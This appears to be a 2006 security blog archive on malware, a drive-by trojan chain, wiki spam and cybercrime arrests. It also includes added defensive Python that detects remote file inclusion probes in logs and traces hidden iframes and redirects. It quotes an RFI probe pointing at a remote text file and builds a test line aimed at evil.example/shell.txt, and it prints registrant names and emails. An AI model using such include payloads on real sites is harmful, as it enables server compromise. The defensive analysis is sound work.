Archive for the ‘Parasites’ Category

First cybercrime conviction in Russia?

Thursday, October 5th, 2006

Three Russians were sentenced to eight years of hard time for extortion in connection with denial of service attacks.

Anna from Kaspersky told me in June that there was a Russian law that could be used against cybercrime, but that it hadn’t been used so far. That mirrors what they said in their blog yesterday. This is a very important sentence, even if the sentencing reflected the extortion more than the cybercrime.

Other news reports:

Informationweek, Securityfocus

VML patch out

Friday, September 22nd, 2006

There’s a new vulnerability in Windows that Microsoft isn’t going to patch until October 10. In the meantime, Webattacker is pushing out exploits for it.

The vulnerability is exploited through Internet Explorer. If you’re using Firefox, you’re safe from that particular vulnerability.

But how many of us have friends, co-workers and family who insist on using Internet Explorer, because it’s familiar?

ZERT has released a patch for the vulnerability, according to Eweek. It also mentions that Gadi Evron, bothunter extraordinaire, is operations manager for ZERT.

Probing phpBB vulnerability

Sunday, September 17th, 2006

I saw some probing of phpBB in my logs. The probes looked like this:
GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me: phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I have since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject - was not innocent. Let’s just put it like that for the time being.
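Added example, not code from the original post: a small Python log scanner that pulls requests like the one quoted above out of an Apache combined log and reports every query parameter whose value is itself a URL, which is what a remote file inclusion probe looks like whatever script it is aimed at. The log lines, source addresses and the evil.example host are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format). They are made up
# for this example; only the first two mirror the shape of the probe quoted above.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Sep/2006:03:12:45 +0200] "GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt? HTTP/1.1" 404 1234 "-" "Mozilla/4.0"
203.0.113.7 - - [17/Sep/2006:03:12:46 +0200] "GET /2006/08/07/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt? HTTP/1.1" 404 1234 "-" "Mozilla/4.0"
198.51.100.9 - - [17/Sep/2006:09:00:01 +0200] "GET /2006/09/14/ HTTP/1.1" 200 8765 "http://www.google.com/" "Mozilla/5.0"
192.0.2.44 - - [17/Sep/2006:10:00:00 +0200] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.0" 200 4321 "-" "libwww-perl/5.805"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# A parameter value that is itself an absolute URL is the signature of a remote
# file inclusion attempt: a PHP include() of that variable fetches it from the
# attacker's server when remote includes are enabled.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_probes(log_text):
    """Return one record per query parameter whose value points at a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes once; unquote again to catch double encoding.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)
            if not REMOTE_RE.match(value):
                continue
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "script": parts.path,
                "param": name,
                "remote_url": value,
                "remote_host": urlsplit(value).hostname,
                # A trailing '?' turns whatever the vulnerable script appends to the
                # path into a query string on the attacker's server, so the fetch works.
                "truncates_path": value.endswith("?"),
                "status": int(m.group("status")),
            })
    return hits


def probes_by_source(hits):
    """Count probes per source IP, most active first."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} -> {h["script"]} ?{h["param"]}= {h["remote_url"]} (HTTP {h["status"]})')
    print(probes_by_source(hits))
```

The scanner keys on the shape of the parameter value rather than on the phpBB path, so the same probe aimed at any other include-style parameter (the constructed page= line) is caught too. A 404 on a path that does not exist on your site is still worth a look at the source address, because the same scanner usually tries every URL it has seen phpBB mentioned in.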

British identity theft article

Wednesday, September 6th, 2006

The Sunday Times broke a story on stolen identities (credit card details etc.) being sold on a Russian website.

The website, carder.info, is now offline.

There was an earlier story, and I found a long version of it on an Infosec discussion list.

We’ve had comment spam on here that offered skimmers for sale, and also (if I remember correctly) credit card details.
It’s also interesting to note that only some of the victims of this site knew something was wrong with their computer.

Protect computer while checking risky sites

Monday, September 4th, 2006

What’s the best way to protect your Windows computer while checking risky sites, such as spamvertized sites?

Those who want to study what the malware does tend to use a virtual machine, such as VMware. Also check out the Wikipedia article on virtual machines. There’s also something called a Browser Appliance from VMware.

Regular people who just want to protect their computers seem to like Sandboxie.

What do you guys use?

Trojan dropping from Inhoster

Thursday, August 31st, 2006

I started out reporting a comment spammer to Intercage. He was spamming from 216.255.190.66.

The spam contained a URL at mytcentral.com, which is at 216.255.185.10.

I checked the URL in my browser, and my anti-virus woke up and nuked a trojan.

So I checked some more. Can’t say for sure I found the infectious stuff, but here’s what I think I found:

There was an advertising banner at se-v.com (69.50.177.38) which, among other things, produced an iframe of one pixel width and height. That one was on ps500.com (85.255.116.246).

From then on, I found a string of 302 redirects on another domain at the same IP address, 24hwebsex.com (85.255.116.246), ending up at a very risky looking URL (nb, I’ve munged it to avoid accidental infections):

http://24hwebsex.com*/demo.php

I tried that URL directly anyway, and got this (blank) URL in return:

http://www.24hwebsex.com*/cgi-bin/ie0606.cgi?type=MS06-006

When I try that with a text browser and leave out the type parameter, I get this (munged, both code and some detail):

Web-Attacker Control panel

Your IP is: (munged)

Your Browser is: Firefox 1.5.0.6

Your Operation System is: Windows XP

Current Date and Time: 31-Aug-2006 12:8

Please enter the password to access the statistics

FORM action - http://24hwebsex.com*/cgi-bin/ie0606.cgi

INPUT type “password” name “password”

INPUT type “submit” value “Enter”

I found mention of this software at the Bleedingedge forums.

And it might be the same software Sophos wrote about in March. Wikipedia entry.
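Walking a chain like this by hand is tedious, and a normal browser would have rendered the payload along the way. The following Python is an added example, not the author’s tooling: it fetches a page without following redirects, lists any iframe that is sized 1x1 or otherwise hidden, and then follows each hidden iframe’s Location hops one at a time, recording every URL and status code and stopping on loops. The hosts in the constructed responses (ad.example, land.example, final.example) and the default Lynx User-Agent string are assumptions for the example; the network-using fetch_once only runs if you call trace_banner with it.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin
import urllib.error
import urllib.request

REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # hand back the 3xx instead of following it


def fetch_once(url, user_agent="Lynx/2.8.5rel.1 libwww-FM/2.14"):
    """Fetch one URL without following redirects; returns (status, headers, body).
    Default User-Agent is an assumption: the kit answers per browser, so send the one
    whose response you want to see. The body is stored, never rendered."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, dict(resp.headers), resp.read(256 * 1024)
    except urllib.error.HTTPError as e:  # unfollowed 3xx and 4xx/5xx both land here
        return e.code, dict(e.headers), (e.read(256 * 1024) if e.fp is not None else b"")


def walk_redirects(url, fetch=fetch_once, max_hops=10):
    """Follow Location headers by hand, recording every hop and stopping on loops."""
    chain, seen = [], {url}
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        chain.append((url, status))
        if status not in REDIRECT_CODES:
            return chain, body
        location = next((v for k, v in headers.items() if k.lower() == "location"), None)
        if not location:
            return chain, body
        url = urljoin(url, location)
        if url in seen:
            chain.append((url, "loop"))
            return chain, b""
        seen.add(url)
    chain.append((url, "max-hops"))
    return chain, b""


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.found.append({k.lower(): (v or "") for k, v in attrs})


def _pixels(value):
    """'1' or '1px' -> 1.0; '100%' or junk -> None (only pixel sizes count as tiny)."""
    try:
        return float(value.strip().lower().removesuffix("px"))
    except ValueError:
        return None


def find_iframes(html, base_url):
    """List every iframe with its resolved src and flag the ones a visitor never sees."""
    p = _IframeCollector()
    p.feed(html)
    out = []
    for a in p.found:
        w, h = _pixels(a.get("width", "")), _pixels(a.get("height", ""))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ((w is not None and w <= 1) or (h is not None and h <= 1)
                  or "display:none" in style or "visibility:hidden" in style)
        out.append({"src": urljoin(base_url, a.get("src", "")), "width": a.get("width", ""),
                    "height": a.get("height", ""), "hidden": hidden})
    return out


def trace_banner(url, fetch=fetch_once):
    """Fetch a banner page, then trace each hidden iframe through its redirect chain."""
    status, _, body = fetch(url)
    report = []
    for frame in find_iframes(body.decode("latin-1", errors="replace"), url):
        if frame["hidden"]:
            chain, _ = walk_redirects(frame["src"], fetch)
            report.append({"iframe": frame, "chain": chain})
    return status, report


# Constructed offline stand-in for the chain described above (made-up hosts).
CONSTRUCTED_RESPONSES = {
    "http://ad.example/banner.html": (200, {}, b'<html><body><img src="b.gif">'
        b'<iframe src="http://land.example/in.php" width=1 height=1></iframe></body></html>'),
    "http://land.example/in.php": (302, {"Location": "/step2.php"}, b""),
    "http://land.example/step2.php": (302, {"Location": "http://final.example/demo.php"}, b""),
    "http://final.example/demo.php": (200, {"Content-Type": "text/html"}, b"<html>landing</html>"),
}


def fake_fetch(url, user_agent=None):
    return CONSTRUCTED_RESPONSES.get(url, (404, {}, b""))


if __name__ == "__main__":
    status, report = trace_banner("http://ad.example/banner.html", fake_fetch)
    for r in report:
        print(r["iframe"]["src"], "->", " -> ".join(f"{u} [{s}]" for u, s in r["chain"]))
```

Fetching a live kit URL still pulls the payload down to whatever machine runs this, so do it from a throwaway VM, and vary the User-Agent: a panel that reports “Your Browser is: Firefox 1.5.0.6” is choosing what to serve on exactly that string.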
——————

Whois:

08/31/06 12:22:27 whois mytcentral.com

Registration Service Provided By: ESTDOMAINS INC

Registrant:
none
Serg (serg78@pisem.net)
Lesnay 1-54
Pushkino
msk,687120
RU
Tel. +321.96478521

Creation Date: 21-Feb-2006
Expiration Date: 21-Feb-2007

Domain servers in listed order:
ns15.crybits.com
ns14.crybits.com

08/31/06 12:23:09 whois se-v.com

whois -h whois.estdomains.com se-v.com …
Registration Service Provided By: ANUNAH LLC

Registrant:
N/A
Abdula Khaled-Mamed Dzibah (glac@crybits.com)
Shaytanhasy Obdukurlasy 2
Islamabad
Islamabad,54000
PK
Tel. +763.2784936

Creation Date: 17-Mar-2006
Expiration Date: 17-Mar-2007

Domain servers in listed order:
ns15.crybits.com
ns14.crybits.com

08/31/06 12:21:21 whois ps500.com

Registration Service Provided By: ESTDOMAINS INC

Registrant:
none
Alex Zudov (work@vnukovo.net)
Uralskay 14
Zarechensk
Msk,095437
RU
Tel. +78.63798524

Creation Date: 03-Aug-2006
Expiration Date: 03-Aug-2007

Domain servers in listed order:
ns1.dns-parking.com
ns2.dns-parking.com

08/31/06 12:20:46 whois 24hwebsex.com

Registration Service Provided By: ESTDOMAINS INC

Registrant:
n/a
Alex Ferietko (websex24hour@yahoo.com)
Hrushevsky str 16, ap 26
Ivano-Frankivs
Ivano-Frankivs’ka Oblast’,252033
UA
Tel. +38.0342225216

Creation Date: 16-Jul-2006
Expiration Date: 16-Jul-2007

Domain servers in listed order:
ns2.24hwebsex.com
ns1.24hwebsex.com

Update: Check out the Spamhaus record for 85.255.116.246

Every special page wiki spammer

Tuesday, July 18th, 2006

I had a visit from a spammer that spams every special page on MediaWiki that I’ve never heard of. Pages with weird names. Pages that didn’t exist, because most of them were talk pages for possibly existing pages. I have no idea how many pages he spammed. More than 30 would be my guess. He also tagged some talk pages for existing users. And he completely filled them with porn links.

So, here’s a short rundown. I’ve got more, but will try to condense it some.

IP addresses used to spam from. Interesting, because the first five I checked were all Asian:

58.79.206.53
58.226.83.170
58.230.250.23
59.19.214.176
59.21.210.203
59.150.200.40
61.33.174.189
61.35.176.77
61.248.35.110
67.15.42.29
124.49.135.22
124.61.111.177
163.180.200.211
165.229.48.30
194.117.134.196
202.54.61.99
203.81.136.101
203.236.103.196
210.91.187.248
210.92.103.94
210.92.158.98
211.38.113.101
211.38.191.144
211.50.92.91
211.104.149.173
211.113.213.132
211.178.129.104
211.195.40.226
211.217.137.77
211.219.6.246
211.221.210.158
211.213.131.228
218.25.163.18
218.52.58.26
218.108.24.117
218.145.101.210
218.152.81.57
218.209.42.100
218.209.208.189
219.238.187.3
219.248.66.109
220.3.92.45
220.72.163.175
220.87.148.37
220.124.118.210
220.124.234.54
220.231.30.34
221.149.59.96
221.153.11.138
221.165.123.131
221.165.193.67
222.108.150.107
222.118.179.165
222.111.167.19
The spamvertized domains were:

1domiks.org
1ebalo.org
1foleks.org
1golod.org
1hrens.org
1ibanusiks.org
1jolla.org

IP addresses of webhosts:

74.52.17.161
74.52.17.162
74.52.17.163

The pages all had iframes that showed an affiliate page at 100% width and 5000 pixels height.

Affiliate: yourfreevids.com id=751

These e-mail addresses were used:

krun@mail333.com
letuns@mail333.com
stoker@mail333.com

Whois info is most likely fake, but here it is, in case someone’s searching for exactly that data:

Registrant Name:Bilanov
Registrant Organization:1dil
Registrant Street1:Vore 67543
Registrant City:Blin
Registrant State/Province:0
Registrant Postal Code:15478
Registrant Country:MX
Registrant Phone:+746.786546786

Registrant Name:Kakauya raznica
Registrant Organization:1hren
Registrant Street1:ddd 15
Registrant City:Fedor city
Registrant State/Province:0
Registrant Postal Code:76454
Registrant Country:BR
Registrant Phone:+764.768456456

Registrant Name:Pizdec komuto
Registrant Organization:Pizdec
Registrant Street1:debilov 98746354
Registrant City:blya
Registrant State/Province:0
Registrant Postal Code:47852
Registrant Country:AR
Registrant Phone:+452.48678654467

——-

I checked Google for the e-mail addresses, and hit paydirt. One of the e-mail addresses had been used to spamvertize a subdomain on dia-host.com in January 2005.

The website is no longer active, but the whois is:

DiabloCompany
Diablo (admin@new-incest.com)
Garvard 2-10
Oklahoma
null,655158
ES
Tel. +91.2228797504

I found that exact whois info on coolsearcher.net, which has been found to contain malicious downloads (see the Description pane here). I also found references to new-incest.com at sites warning about CoolWebSearch hijackers.

Got an infected machine?

Saturday, July 8th, 2006

If you think you may have a trojan on your system, or lots of popups or lots of adware, you can check out this forum:

Castlecop HijackThis forum

HijackThis is a tool that checks what processes your computer is running, and what your browser is bogged down with. Do NOT delete stuff with HijackThis on your own, unless you’re a professional at IT-security! And even then, I know a few IT-consultants who wouldn’t do it on their own… But HijackThis is a wonderful tool for others to help you clean your computer.

Three held over virus e-mail plot

Wednesday, June 28th, 2006

BBC NEWS | Technology | Three held over virus e-mail plot

Spamming and virusing in one neat bundle, targeted at businesses.

Heady stuff…

But the important bit was at the end:

He said he hoped the arrests would send a “clear signal” that national borders would not stop the authorities taking action over malicious computer software.

Musings: Would it be possible to notify zombies?

Saturday, May 27th, 2006

I’ve been reading a Register story about disabling botnets.

The story’s writer advocates disabling botnets, essentially hacking them and shutting them down. But wouldn’t those bots get herded into another botnet pretty quickly? Unless the hole was patched, of course. But machines belonging to people who allow their machines to get infected would probably get infected with something else pretty quickly.

Would it be possible for anyone who’s good enough to log into a botnet to send a big popup to the computer, telling the owner that it’s infected, and exhorting him/her to do a full reinstall? Maybe a link to an article at a very prestigious site where they could read more?

Just a theory…